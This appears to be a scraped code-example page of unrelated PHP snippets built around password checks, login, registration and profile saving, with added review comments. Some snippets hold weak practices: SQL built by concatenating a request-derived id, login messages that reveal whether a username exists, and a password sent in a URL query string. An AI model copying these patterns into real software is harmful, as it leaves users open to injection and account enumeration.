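    $uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $alpha = $uppercase . $lowercase;
    $numeric = "0123456789";
    $special = "!@\$%^&*().?";
    $password = "";
    # Draw one character from $set with uniform probability.
    $pick = function ($set) {
        return $set[random_int(0, strlen($set) - 1)];
    };
    # Add alphanumerics
    for ($n = 0; $n < $password_min_alpha; $n++) {
        $password .= $pick($alpha);
    }
    # Add upper case
    for ($n = 0; $n < $password_min_uppercase; $n++) {
        $password .= $pick($uppercase);
    }
    # Add numerics
    for ($n = 0; $n < $password_min_numeric; $n++) {
        $password .= $pick($numeric);
    }
    # Add special
    for ($n = 0; $n < $password_min_special; $n++) {
        $password .= $pick($special);
    }
    # Pad with lower case
    $padchars = $password_min_length - strlen($password);
    for ($n = 0; $n < $padchars; $n++) {
        $password .= $pick($lowercase);
    }
    # Shuffle the password (Fisher-Yates driven by random_int), so the position
    # of each character class is not predictable.
    for ($i = strlen($password) - 1; $i > 0; $i--) {
        $j = random_int(0, $i);
        $swap = $password[$i];
        $password[$i] = $password[$j];
        $password[$j] = $swap;
    }
    # Check the password
    $check = check_password($password);
    if ($check !== true) {
        # NOTE(review): the message below prints the generated password; harmless
        # while it is discarded, but keep it out of persistent logs.
        exit("Error: unable to automatically produce a password that met the criteria. Please check the password criteria in config.php. Generated password was '{$password}'. Error was: " . $check);
    }
    return $password;
}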
Esempio n. 22
<tr>
<td><input type="submit" id="submit" value="Login"></td>
</tr>
</table>
</form>

<?php 
} else {
    ?>

<?php 
    // Login handler: read the posted credentials, verify them and store the user id in the session.
    $username = $_POST["username"];
    $password = $_POST["password"];
    // Only the username is passed through cleanup_text(); the password is used as posted.
    $username = cleanup_text($username);
    // $query is assigned but not used in the visible lines; the '******' in it looks
    // like text masked on this page.
    $query = "select password in users where username = '******'";
    if (check_password($link, $username, $password)) {
        $userid = get_userid($link, $username);
        // NOTE(review): no session id regeneration is visible before the user id is
        // stored — confirm it happens elsewhere (session fixation).
        $_SESSION[$session] = $userid;
        echo "Logged in successfully!<br>";
    } else {
        // NOTE(review): the two distinct messages below tell a caller whether a
        // username exists; a single generic failure message avoids that disclosure.
        if (username_existed($link, $username)) {
            die("Wrong password!");
        } else {
            die("Username does not exist!");
        }
    }
    ?>

<?php 
}
?>
 //########### CHANGE PASSWORD ##########
 if ($action == "changepassword") {
     $new_password = trim($_POST['newpassword']);
     $new_password2 = trim($_POST['newpassword2']);
     $old_password = trim($_POST['oldpassword']);
     if (empty($new_password) && empty($new_password2) && empty($old_password)) {
         $main_content .= 'Please enter your current password and a new password. For your security, please enter the new password twice.<br/><br/><form action="?subtopic=accountmanagement&action=changepassword" method="post" ><div class="TableContainer" ><table class="Table1" cellpadding="0" cellspacing="0" >    <div class="CaptionContainer" ><div class="CaptionInnerContainer" ><span class="CaptionEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionBorderTop" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><div class="Text" >Change Password</div><span class="CaptionVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><span class="CaptionBorderBottom" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightBottom" style="background-image:url(' . $layout_name . 
'/images/content/box-frame-edge.gif);" /></span></div>    </div>    <tr>      <td>        <div class="InnerTableContainer" >          <table style="width:100%;" ><tr><td class="LabelV" ><span >New Password:</span></td><td style="width:90%;" ><input type="password" name="newpassword" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >New Password Again:</span></td><td><input type="password" name="newpassword2" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >Current Password:</span></td><td><input type="password" name="oldpassword" size="30" maxlength="29" ></td></tr></table>        </div>  </table></div></td></tr><br/><table style="width:100%;" ><tr align="center"><td><table border="0" cellspacing="0" cellpadding="0" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Submit" alt="Submit" src="' . $layout_name . '/images/buttons/_sbutton_submit.gif" ></div></div></td><tr></form></table></td><td><table border="0" cellspacing="0" cellpadding="0" ><form action="?subtopic=accountmanagement" method="post" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Back" alt="Back" src="' . $layout_name . '/images/buttons/_sbutton_back.gif" ></div></div></td></tr></form></table></td></tr></table>';
     } else {
         if (empty($new_password) || empty($new_password2) || empty($old_password)) {
             $show_msgs[] = "Please fill in form.";
         }
         if ($new_password != $new_password2) {
             $show_msgs[] = "The new passwords do not match!";
         }
         if (empty($show_msgs)) {
             if (!check_password($new_password)) {
                 $show_msgs[] = "New password contains illegal chars (a-z, A-Z and 0-9 only!) or lenght.";
             }
             if (!$account_logged->isValidPassword($old_password)) {
                 $show_msgs[] = "Current password is incorrect!";
             }
         }
         if (!empty($show_msgs)) {
             //show errors
             $main_content .= '<div class="SmallBox" >  <div class="MessageContainer" >    <div class="BoxFrameHorizontal" style="background-image:url(' . $layout_name . '/images/content/box-frame-horizontal.gif);" /></div>    <div class="BoxFrameEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div>    <div class="BoxFrameEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div>    <div class="ErrorMessage" >      <div class="BoxFrameVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></div>      <div class="BoxFrameVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></div>      <div class="AttentionSign" style="background-image:url(' . $layout_name . '/images/content/attentionsign.gif);" /></div><b>The Following Errors Have Occurred:</b><br/>';
             foreach ($show_msgs as $show_msg) {
                 $main_content .= '<li>' . $show_msg;
             }
             $main_content .= '</div>    <div class="BoxFrameHorizontal" style="background-image:url(' . $layout_name . '/images/content/box-frame-horizontal.gif);" /></div>    <div class="BoxFrameEdgeRightBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div>    <div class="BoxFrameEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></div>  </div></div><br/>';
             //show form
             $main_content .= 'Please enter your current password and a new password. For your security, please enter the new password twice.<br/><br/><form action="?subtopic=accountmanagement&action=changepassword" method="post" ><div class="TableContainer" ><table class="Table1" cellpadding="0" cellspacing="0" >    <div class="CaptionContainer" ><div class="CaptionInnerContainer" ><span class="CaptionEdgeLeftTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightTop" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionBorderTop" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionVerticalLeft" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><div class="Text" >Change Password</div><span class="CaptionVerticalRight" style="background-image:url(' . $layout_name . '/images/content/box-frame-vertical.gif);" /></span><span class="CaptionBorderBottom" style="background-image:url(' . $layout_name . '/images/content/table-headline-border.gif);" ></span><span class="CaptionEdgeLeftBottom" style="background-image:url(' . $layout_name . '/images/content/box-frame-edge.gif);" /></span><span class="CaptionEdgeRightBottom" style="background-image:url(' . $layout_name . 
'/images/content/box-frame-edge.gif);" /></span></div>    </div>    <tr>      <td>        <div class="InnerTableContainer" >          <table style="width:100%;" ><tr><td class="LabelV" ><span >New Password:</span></td><td style="width:90%;" ><input type="password" name="newpassword" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >New Password Again:</span></td><td><input type="password" name="newpassword2" size="30" maxlength="29" ></td></tr><tr><td class="LabelV" ><span >Current Password:</span></td><td><input type="password" name="oldpassword" size="30" maxlength="29" ></td></tr></table>        </div>  </table></div></td></tr><br/><table style="width:100%;" ><tr align="center"><td><table border="0" cellspacing="0" cellpadding="0" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Submit" alt="Submit" src="' . $layout_name . '/images/buttons/_sbutton_submit.gif" ></div></div></td><tr></form></table></td><td><table border="0" cellspacing="0" cellpadding="0" ><form action="?subtopic=accountmanagement" method="post" ><tr><td style="border:0px;" ><div class="BigButton" style="background-image:url(' . $layout_name . '/images/buttons/sbutton.gif)" ><div onMouseOver="MouseOverBigButton(this);" onMouseOut="MouseOutBigButton(this);" ><div class="BigButtonOver" style="background-image:url(' . $layout_name . '/images/buttons/sbutton_over.gif);" ></div><input class="ButtonText" type="image" name="Back" alt="Back" src="' . $layout_name . '/images/buttons/_sbutton_back.gif" ></div></div></td></tr></form></table></td></tr></table>';
Esempio n. 24
<?php 
    // Handle the "save" action: run the validation checks in order. The first
    // failure sets $ActionMessage and clears $check_info, which skips the
    // remaining checks. (The excerpt ends before the block is closed.)
    if (!empty($_GET['action']) && $_GET['action'] == "save") {
        $check_info = 1;
        if (empty($_SESSION['username'])) {
            // No username in the session: both the user name and the password are validated.
            if (check_user($_POST['addusername']) == 0) {
                $ActionMessage = $strUserAlert;
                $check_info = 0;
                $addusername = "";
            }
            if ($check_info == 1 && check_password($_POST['addpassword']) == 0) {
                $ActionMessage = $strPasswordAlert;
                $check_info = 0;
            }
        } else {
            // A username is in the session: the password is validated only when one was submitted.
            if ($check_info == 1 && $_POST['addpassword'] != "" && check_password($_POST['addpassword']) == 0) {
                $ActionMessage = $strPasswordAlert;
                $check_info = 0;
            }
        }
        // Reject <, >, ' and " in homePage, email and nickname.
        // NOTE(review): a character deny-list does not replace context-aware output
        // encoding where these values are rendered - confirm the templates escape them.
        if ($check_info == 1 && (preg_match("/<|>|'|\"/i", $_POST['homePage']) || preg_match("/<|>|'|\"/i", $_POST['email']) || preg_match("/<|>|'|\"/i", $_POST['nickname']))) {
            $ActionMessage = $strErrorCharacter;
            $check_info = 0;
            $homePage = "";
            $email = "";
            $nickname = "";
        }
        // Check that the two password entries are identical.
        // NOTE(review): loose != compares numeric-looking strings by value (for
        // example "1e3" and "1000" count as equal), so two different entries can
        // pass this check; a strict !== on string values would close that gap.
        // Decide how a missing password_con field should be treated before switching.
        if ($check_info == 1 && $_POST['addpassword'] != $_POST['password_con']) {
            $ActionMessage = $strErrPassword;
            $check_info = 0;
Esempio n. 25
        }
        // Values taken from the logged-in member record; get_email_address() and
        // get_text() are project helpers defined outside this excerpt.
        $email = get_email_address($member['mb_email']);
        $homepage = get_text(stripslashes($member['mb_homepage']));
    }
}
// Defaults for the form state filled in below.
$html_checked = "";
$html_value = "";
$secret_checked = "";
if ($w == '') {
    // $w is empty: the password field is marked as required.
    $password_required = 'required';
} else {
    if ($w == 'u') {
        // $w == 'u': an existing post ($write) is being edited.
        $password_required = '';
        // Authorization: anyone who is neither an administrator nor the member
        // recorded on the post must supply the post's password.
        // The alert text reads "The password is incorrect."
        // NOTE(review): this only protects the post if alert() stops the request -
        // presumably it does; confirm in the helper.
        if (!$is_admin) {
            if (!($is_member && $member['mb_id'] == $write['mb_id'])) {
                if (!check_password($wr_password, $write['wr_password'])) {
                    alert('비밀번호가 틀립니다.');
                }
            }
        }
        // Stored post fields are passed through get_text() before being reused in the form.
        $name = get_text(cut_str(stripslashes($write['wr_name']), 20));
        $email = get_email_address($write['wr_email']);
        $homepage = get_text(stripslashes($write['wr_homepage']));
        for ($i = 1; $i <= G5_LINK_COUNT; $i++) {
            $write['wr_link' . $i] = get_text($write['wr_link' . $i]);
            $link[$i] = $write['wr_link' . $i];
        }
        // The post's option string decides the state of the HTML checkbox.
        if (strstr($write['wr_option'], 'html1')) {
            $html_checked = 'checked';
            $html_value = 'html1';
        } else {
Esempio n. 26
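/**
 * Validate the submitted profile form and store it on the global $user.
 *
 * Reads the fields from $_POST / $_FILES, copies each accepted value onto
 * $user and, when no validation error was recorded, calls $user->store().
 * A "disable my account" request is handled first and ends the request.
 *
 * @return array|null Messages to show to the user, or null when the request
 *                    is not a profile submission the caller may make.
 */
function save_profile()
{
    global $db, $user, $current_user, $globals, $admin_mode, $site_key, $bio_max;
    $errors = 0;
    // benjami: control added (2005-12-22)
    $new_pass = false;
    $messages = array();
    // Anti-CSRF token bound to the edited profile and the logged-in user.
    $form_hash = md5($site_key . $user->id . $current_user->user_id);
    // hash_equals() only accepts strings and compares in constant time; the
    // former loose == / != also treated numeric-looking strings as equal.
    $hash_ok = isset($_POST['form_hash']) && is_string($_POST['form_hash']) && hash_equals($form_hash, $_POST['form_hash']);

    // Account disabling requested by the owner of the account.
    if (isset($_POST['disabledme']) && intval($_POST['disable']) == 1 && $hash_ok && $_POST['user_id'] == $current_user->user_id) {
        $old_user_login = $user->username;
        $old_user_id = $user->id;
        $user->disable(true);
        Log::insert('user_delete', $old_user_id, $old_user_id);
        syslog(LOG_NOTICE, "Meneame, disabling {$old_user_id} ({$old_user_login}) by {$current_user->user_login} -> {$user->username} ");
        $current_user->Logout(get_user_uri($user->username));
        die;
    }

    // Only the owner of the profile, or an administrator, may submit the form.
    if (!isset($_POST['save_profile']) || !isset($_POST['process']) || ($_POST['user_id'] != $current_user->user_id && !$admin_mode)) {
        return;
    }

    // Stop on a missing or wrong token. The avatar branch further down changes
    // stored files before $errors is consulted, so merely counting an error
    // here would still let an unverified request alter the avatar.
    if (!$hash_ok) {
        $messages[] = _('Falta la clave de control');
        return $messages;
    }

    if (!empty($_POST['username']) && trim($_POST['username']) != $user->username) {
        $newname = trim($_POST['username']);
        if (strlen($newname) < 3) {
            $messages[] = _('nombre demasiado corto');
            $errors++;
        }
        if (!check_username($newname)) {
            $messages[] = _('nombre de usuario erróneo, caracteres no admitidos');
            $errors++;
        } elseif (user_exists($newname, $user->id)) {
            $messages[] = _('el usuario ya existe');
            $errors++;
        } else {
            $user->username = $newname;
        }
    }

    if (!empty($_POST['bio']) || $user->bio) {
        $bio = clean_text($_POST['bio'], 0, false, $bio_max);
        if ($bio != $user->bio) {
            $user->bio = $bio;
        }
    }

    $email = trim($_POST['email']);
    if ($user->email != $email && !check_email($email)) {
        $messages[] = _('el correo electrónico no es correcto');
        $errors++;
    } elseif (!$admin_mode && $email != $current_user->user_email && email_exists($email, false)) {
        $messages[] = _('ya existe otro usuario con esa dirección de correo');
        $errors++;
    } else {
        $user->email = $email;
    }

    $user->url = htmlspecialchars(clean_input_url($_POST['url']));

    // Check IM address
    if (!empty($_POST['public_info'])) {
        $_POST['public_info'] = htmlspecialchars(clean_input_url($_POST['public_info']));
        $public = $db->escape($_POST['public_info']);
        $im_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_public_info='{$public}'"));
        if ($im_count > 0) {
            $messages[] = _('ya hay otro usuario con la misma dirección de MI, no se ha grabado');
            $_POST['public_info'] = '';
            $errors++;
        }
    }
    // NOTE(review): outside the owner branch below, the phone value is taken
    // over without the format check - confirm $user->store() escapes it.
    $user->phone = $_POST['phone'];
    // NOTE(review): a non-empty value was already encoded above, so it passes
    // through htmlspecialchars() twice here - confirm that is intended.
    $user->public_info = htmlspecialchars(clean_input_url($_POST['public_info']));
    // End check IM address

    if ($user->id == $current_user->user_id) {
        // Check phone number
        if (!empty($_POST['phone'])) {
            if (!preg_match('/^\\+[0-9]{9,16}$/', $_POST['phone'])) {
                $messages[] = _('número telefónico erróneo, no se ha grabado');
                $_POST['phone'] = '';
                $errors++;
            } else {
                $phone = $db->escape($_POST['phone']);
                $phone_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_phone='{$phone}'"));
                if ($phone_count > 0) {
                    $messages[] = _('ya hay otro usuario con el mismo número, no se ha grabado');
                    $_POST['phone'] = '';
                    $errors++;
                }
            }
        }
        $user->phone = $_POST['phone'];
        // End check phone number
    }

    // Verifies adsense code
    if ($globals['external_user_ads']) {
        $_POST['adcode'] = trim($_POST['adcode']);
        $_POST['adchannel'] = trim($_POST['adchannel']);
        if (!empty($_POST['adcode']) && $user->adcode != $_POST['adcode']) {
            if (!preg_match('/pub-[0-9]{16}$/', $_POST['adcode'])) {
                $messages[] = _('código AdSense incorrecto, no se ha grabado');
                $_POST['adcode'] = '';
                $errors++;
            } else {
                // The pattern above is not anchored at the start, so it does not
                // constrain the whole value. Escape it like the phone and IM
                // values so it is always treated as data inside the query.
                $adcode = $db->escape($_POST['adcode']);
                $adcode_count = intval($db->get_var("select count(*) from users where user_id != {$user->id} and user_level != 'disabled' and user_level != 'autodisabled' and user_adcode='{$adcode}'"));
                if ($adcode_count > 0) {
                    $messages[] = _('ya hay otro usuario con la misma cuenta, no se ha grabado');
                    $_POST['adcode'] = '';
                    $errors++;
                }
            }
        }
        if (!empty($_POST['adcode']) && !empty($_POST['adchannel']) && $user->adchannel != $_POST['adchannel']) {
            if (!preg_match('/^[0-9]{10,12}$/', $_POST['adchannel'])) {
                $messages[] = _('canal AdSense incorrecto, no se ha grabado');
                $_POST['adchannel'] = '';
                $errors++;
            }
        }
        $user->adcode = $_POST['adcode'];
        $user->adchannel = $_POST['adchannel'];
    }

    $user->names = clean_text($_POST['names']);

    // Password change.
    // NOTE(review): the current password is not asked for here; the form token
    // is the only proof that the account owner sent the request.
    if (!empty($_POST['password']) || !empty($_POST['password2'])) {
        // Run the strength check on exactly the value that gets hashed; before,
        // the untrimmed input was checked but the trimmed one was stored.
        $password = isset($_POST['password']) ? trim($_POST['password']) : '';
        $password2 = isset($_POST['password2']) ? trim($_POST['password2']) : '';
        if (!check_password($password)) {
            $messages[] = _('Clave demasiado corta, debe ser de 6 o más caracteres e incluir mayúsculas, minúsculas y números');
            $errors++;
        } elseif ($password !== $password2) {
            $messages[] = _('las claves no son iguales, no se ha modificado');
            $errors++;
        } else {
            $new_pass = $password;
            $user->pass = UserAuth::hash($new_pass);
            $messages[] = _('La clave se ha cambiado');
        }
    }

    // Level and karma can only be changed in admin mode.
    if ($admin_mode && !empty($_POST['user_level'])) {
        $user->level = $db->escape($_POST['user_level']);
    }
    if ($admin_mode && !empty($_POST['karma']) && is_numeric($_POST['karma']) && $_POST['karma'] > 4 && $_POST['karma'] <= 20) {
        $user->karma = $_POST['karma'];
    }

    // Bit field: comment preference plus bit 1 (show_friends) and bit 2 (show_2cols).
    $user->comment_pref = intval($_POST['comment_pref']) + (intval($_POST['show_friends']) & 1) * 2 + (intval($_POST['show_2cols']) & 1) * 4;

    // Manage avatars upload
    if (!empty($_FILES['image']['tmp_name'])) {
        if (avatars_check_upload_size('image')) {
            $avatar_mtime = avatars_manage_upload($user->id, 'image');
            if (!$avatar_mtime) {
                $messages[] = _('error guardando la imagen');
                $errors++;
                $user->avatar = 0;
            } else {
                $user->avatar = $avatar_mtime;
            }
        } else {
            $messages[] = _('el tamaño de la imagen excede el límite');
            $errors++;
            $user->avatar = 0;
        }
    } elseif (!empty($_POST['avatar_delete'])) {
        // !empty() avoids an undefined-index notice when the box is not ticked.
        $user->avatar = 0;
        avatars_remove($user->id);
    }

    // Reset avatar for the logged user
    if ($current_user->user_id == $user->id) {
        $current_user->user_avatar = $user->avatar;
    }

    if (!$errors) {
        if (empty($user->ip)) {
            $user->ip = $globals['user_ip'];
        }
        $user->store();
        $user->read();
        // Re-authenticate when the login name, e-mail or password changed.
        if (!$admin_mode && ($current_user->user_login != $user->username || $current_user->user_email != $user->email || $new_pass)) {
            $current_user->Authenticate($user->username, $new_pass);
        }
        $messages[] = _('datos actualizados');
    }
    return $messages;
}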
Esempio n. 27
<?php

include 'include/database.class.php';
/* If any registration value is invalid,
 * put an error message in the error string
 * to inform the other page, error.php.
 */
// Registration entry point: all three query-string values must be present.
// NOTE(review): the password arrives in the URL query string; URLs are
// commonly kept in server logs, proxies and browser history, so a POST body
// is the safer transport. FILTER_SANITIZE_STRING is deprecated as of PHP 8.1.
if (!isset($_GET['uname'], $_GET['uemail'], $_GET['upassword'])) {
    $mgs = "INFORMATION NOT PROPERLY SET";
    send_error($mgs);
} else {
    $upassword = $_GET['upassword'];
    $uemail = filter_input(INPUT_GET, 'uemail', FILTER_SANITIZE_EMAIL);
    $uname = filter_input(INPUT_GET, 'uname', FILTER_SANITIZE_STRING);
    // The checks return nothing, and insert_user() runs unconditionally after them.
    // NOTE(review): that is only safe if every failing check ends the request -
    // confirm send_error() exits. How insert_user() stores the password is not
    // visible here - confirm it is hashed with password_hash().
    check_email($uemail);
    check_user_exists($uname, $uemail);
    check_password($upassword);
    insert_user($uname, $uemail, $upassword);
}
/**
 * Reject a syntactically invalid or already registered e-mail address.
 *
 * The excerpt ends inside the final else branch, so the behaviour for an
 * accepted address is not shown.
 */
function check_email($uemail)
{
    if (!filter_var($uemail, FILTER_VALIDATE_EMAIL)) {
        $mgs = "INVALID EMAIL";
        // NOTE(review): unlike the branch below, no exit follows send_error() here;
        // unless send_error() itself ends the request, the caller carries on with
        // an invalid address - confirm.
        send_error($mgs);
    } else {
        if (check_email_exists($uemail)) {
            $mgs = "EMAIL ALREADY REGISTERED";
            send_error($mgs);
            exit;
        } else {
Esempio n. 28
{
    // Print the pending session message once, then clear it.
    // NOTE(review): the value is echoed without HTML encoding; the only writer
    // visible in this excerpt passes a fixed string to set_msg() - confirm no
    // caller stores request data in it.
    echo $_SESSION['msg'];
    unset($_SESSION['msg']);
}
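// CSS display value for the message box: shown only while a message is pending.
$dis = "none";
if (isset($_SESSION['msg'])) {
    $dis = "block";
}

// Login form handler: look the account up by e-mail, verify the password and
// redirect to the user's home page, or back to login.php with a generic message.
// NOTE(review): the mysql_* extension was removed in PHP 7; mysqli or PDO with
// prepared statements is the supported replacement.
if (isset($_POST['email']) && isset($_POST['password'])) {
    mysql_select_db($database_contacts, $contacts);
    $query_logincheck = "SELECT * FROM users WHERE user_email = '" . mysql_real_escape_string($_POST['email']) . "'";
    $logincheck = mysql_query($query_logincheck, $contacts);
    if ($logincheck === false) {
        // Keep the database error in the server log; it used to be printed to the client.
        error_log('Login query failed: ' . mysql_error());
        die('Login is temporarily unavailable.');
    }
    $row_logincheck = mysql_fetch_assoc($logincheck);
    $totalRows_logincheck = mysql_num_rows($logincheck);
    if ($totalRows_logincheck == 1 && check_password($_POST['password'], $row_logincheck['user_password'], $row_logincheck['user_salt'])) {
        // Issue a fresh session id at login so an id known before
        // authentication is not carried into the authenticated session.
        if (session_id() !== '') {
            session_regenerate_id(true);
        }
        // Stored exactly as before (SQL-escaped) because other pages may rely on it.
        $_SESSION['user'] = mysql_real_escape_string($_POST['email']);
        $redirect = $row_logincheck['user_home'];
        header(sprintf('Location: %s', $redirect));
        die;
    } else {
        // Same message for an unknown e-mail and a wrong password.
        set_msg('Incorrect Username or Password');
        header('Location: login.php');
        die;
    }
}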
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
Esempio n. 29
<?php

include_once './_common.php';
// Login check script: validates the posted member ID and password, then
// refuses blocked, withdrawn or not-yet-certified accounts before handing
// over to the skin's login_check file.
$g5['title'] = "로그인 검사";
$mb_id = trim($_POST['mb_id']);
$mb_password = trim($_POST['mb_password']);
// Both fields are mandatory.
if (!$mb_id || !$mb_password) {
    alert('회원아이디나 비밀번호가 공백이면 안됩니다.');
}
$mb = get_member($mb_id);
// "Not a registered member" and "wrong password" deliberately share one message.
// This stops someone from first testing whether a member ID exists and only then
// trying passwords against it: without knowing which of the two was wrong,
// guessing takes an unauthorized user far longer.
// NOTE(review): every check below relies on alert() ending the request - confirm in the helper.
if (!$mb['mb_id'] || !check_password($mb_password, $mb['mb_password'])) {
    alert('가입된 회원아이디가 아니거나 비밀번호가 틀립니다.\\n비밀번호는 대소문자를 구분합니다.');
}
// Is this ID blocked?
if ($mb['mb_intercept_date'] && $mb['mb_intercept_date'] <= date("Ymd", G5_SERVER_TIME)) {
    $date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_intercept_date']);
    alert('회원님의 아이디는 접근이 금지되어 있습니다.\\n처리일 : ' . $date);
}
// Has this ID been withdrawn?
if ($mb['mb_leave_date'] && $mb['mb_leave_date'] <= date("Ymd", G5_SERVER_TIME)) {
    $date = preg_replace("/([0-9]{4})([0-9]{2})([0-9]{2})/", "\\1년 \\2월 \\3일", $mb['mb_leave_date']);
    alert('탈퇴한 아이디이므로 접근하실 수 없습니다.\\n탈퇴일 : ' . $date);
}
// E-mail certification is enabled and this account has not been certified yet.
if ($config['cf_use_email_certify'] && !preg_match("/[1-9]/", $mb['mb_email_certify'])) {
    // NOTE(review): the key is an MD5 of two stored account fields (IP and
    // registration time), not a random secret - confirm register_email.php does
    // not rely on it being unguessable.
    // NOTE(review): $mb_id is placed in the URL without urlencode().
    $ckey = md5($mb['mb_ip'] . $mb['mb_datetime']);
    confirm("{$mb['mb_email']} 메일로 메일인증을 받으셔야 로그인 가능합니다. 다른 메일주소로 변경하여 인증하시려면 취소를 클릭하시기 바랍니다.", G5_URL, G5_BBS_URL . '/register_email.php?mb_id=' . $mb_id . '&ckey=' . $ckey);
}
// The @ operator suppresses errors raised by the include.
@(include_once $member_skin_path . '/login_check.skin.php');
Esempio n. 30
    echo display_message($f_message, $f_language);
    die;
} else {
    // get student basic information
    // NOTE(review): $id is concatenated into the SQL text of both queries below
    // and its origin is outside this excerpt. If it comes from the request, it
    // has to be escaped or bound as a parameter before it reaches sql_query().
    $l_sql = " select student_id, dateregistered, lastaccess, lname, fname, gender, birthday ";
    $l_sql .= " ,church, salvation, coname, address1, address2, city ";
    $l_sql .= " ,prov, pcode, country, phone, email, lessonpts, bonuspts, awards, events, comments, zone, jonathan ";
    $l_sql .= " from student where binary id = '" . $id . "' ";
    $result = sql_query($l_sql, $dbi);
    list($f_student_id, $f_dateregistered, $f_lastaccess, $f_lname, $f_fname, $f_gender, $f_birthday, $f_church, $f_salvation, $f_coname, $f_address1, $f_address2, $f_city, $f_prov, $f_pcode, $f_country, $f_phone, $f_email, $f_lessonpts, $f_bonuspts, $f_awards, $f_events, $f_comments, $f_zone, $f_jonathan) = sql_fetch_array($result);
    // Replace the stored lesson points with the sum of the student's history rows.
    $l_sql = "select sum(a.points) from history a, student b where a.student_id = b.student_id and b.id = '" . $id . "'";
    $result = sql_query($l_sql, $dbi);
    list($f_lessonpts) = sql_fetch_array($result);
}
//(3) check the password: a missing, empty or rejected password ends the
//    request (check_password() signals failure with a negative value).
if (!isset($password) or $password == "" or check_password($id, $password) < 0) {
    $f_message .= _PASS_INCORRECT;
    echo display_message($f_message, $f_language);
    die;
}
//(4) check that the user has not already completed this quiz.
//(4.0) fix the data of history, this is a one-time run
//fix_history();
//(4.1) check the student and the lesson; a result of 0 from
//      check_complete_lesson() is reported as "already completed".
if ($f_student_id > 0 and $f_lesson_id > 0) {
    if (check_complete_lesson($f_student_id, $f_lesson_id) == 0) {
        $f_message .= _COMPLETED_LESSON;
        echo display_message($f_message, $f_language);
        die;
    }
}